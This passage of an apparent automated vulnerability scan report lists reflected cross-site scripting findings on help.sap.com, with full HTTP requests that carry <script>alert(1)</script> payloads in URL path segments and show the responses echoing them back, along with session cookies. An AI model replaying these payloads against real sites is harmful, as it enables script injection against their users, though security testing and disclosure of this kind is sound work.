Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215469264%3B%20pe%3Dno%2520value%7C1321215469267%3B%20c3%3Dno%2520value%7C1321215469279%3B%20s_nr%3D1321213669286-Returning%7C1323805669286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813669290%3B%20s_visit%3D1%7C1321215469292%3B%20gpv_p47%3Dno%2520value%7C1321215469295%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:28 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 87

File not found: /fstatic/staticimg116cc<script>alert(1)</script>866c815398d/active.png

1.26. http://help.sap.com/fstatic/staticimg/active.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/active.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2b53e<script>alert(1)</script>f65685dfe5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg/active.png2b53e<script>alert(1)</script>f65685dfe5e?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/boall/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215469264%3B%20pe%3Dno%2520value%7C1321215469267%3B%20c3%3Dno%2520value%7C1321215469279%3B%20s_nr%3D1321213669286-Returning%7C1323805669286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813669290%3B%20s_visit%3D1%7C1321215469292%3B%20gpv_p47%3Dno%2520value%7C1321215469295%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:30 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 87

File not found: /fstatic/staticimg/active.png2b53e<script>alert(1)</script>f65685dfe5e

1.27. http://help.sap.com/fstatic/staticimg/bg_diag_gray.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/bg_diag_gray.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 105ae<script>alert(1)</script>8208217648a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg105ae<script>alert(1)</script>8208217648a/bg_diag_gray.gif?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:07 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 93

File not found: /fstatic/staticimg105ae<script>alert(1)</script>8208217648a/bg_diag_gray.gif

1.28. http://help.sap.com/fstatic/staticimg/bg_diag_gray.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/bg_diag_gray.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63639<script>alert(1)</script>ffb9b6d4be7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg/bg_diag_gray.gif63639<script>alert(1)</script>ffb9b6d4be7?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:10 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 93

File not found: /fstatic/staticimg/bg_diag_gray.gif63639<script>alert(1)</script>ffb9b6d4be7

1.29. http://help.sap.com/fstatic/staticimg/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19c54<script>alert(1)</script>2e767a4db22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg19c54<script>alert(1)</script>2e767a4db22/favicon.ico HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:14 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 88

File not found: /fstatic/staticimg19c54<script>alert(1)</script>2e767a4db22/favicon.ico

1.30. http://help.sap.com/fstatic/staticimg/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64d8b<script>alert(1)</script>9635c267d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg/favicon.ico64d8b<script>alert(1)</script>9635c267d71 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:17 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 88

File not found: /fstatic/staticimg/favicon.ico64d8b<script>alert(1)</script>9635c267d71

1.31. http://help.sap.com/fstatic/staticimg/sprites.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/sprites.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76279<script>alert(1)</script>406dd7aa460 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg76279<script>alert(1)</script>406dd7aa460/sprites.png?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:07 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 88

File not found: /fstatic/staticimg76279<script>alert(1)</script>406dd7aa460/sprites.png

1.32. http://help.sap.com/fstatic/staticimg/sprites.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/sprites.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bfed6<script>alert(1)</script>7971fd19724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg/sprites.pngbfed6<script>alert(1)</script>7971fd19724?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:10 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 88

File not found: /fstatic/staticimg/sprites.pngbfed6<script>alert(1)</script>7971fd19724

1.33. http://help.sap.com/fstatic/stylesheets/help.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/stylesheets/help.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bdedf<script>alert(1)</script>e23ec0fffc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/stylesheetsbdedf<script>alert(1)</script>e23ec0fffc8/help.css?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
